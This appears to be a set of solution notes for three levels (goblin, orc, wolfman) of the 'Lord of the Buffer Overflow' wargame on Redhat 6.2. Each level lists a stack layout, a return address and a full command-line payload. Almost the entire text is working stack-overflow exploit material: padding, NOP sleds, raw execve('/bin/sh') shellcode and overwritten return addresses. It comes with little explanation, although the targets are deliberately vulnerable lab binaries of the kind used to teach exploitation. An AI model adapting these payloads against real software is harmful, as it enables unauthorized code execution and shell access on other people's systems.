LOB Redhat 6.2 - wolfman
wolfman - egghunter + buffer hunter + check length of argv[1]
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffbfc
Payload : ./darkelf `python -c 'print "A"*44 + "\xfc\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using argv[2] address

LOB Redhat 6.2 - orc
orc - egghunter + buffer hunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc44
Payload : ./wolfman `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x44\xfc\xff\xbf"'`
Using argv[1] address

LOB Redhat 6.2 - goblin
goblin - egghunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc01
Payload : ./orc `python -c 'print "A"*44 + "\x01\xfc\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using buffer address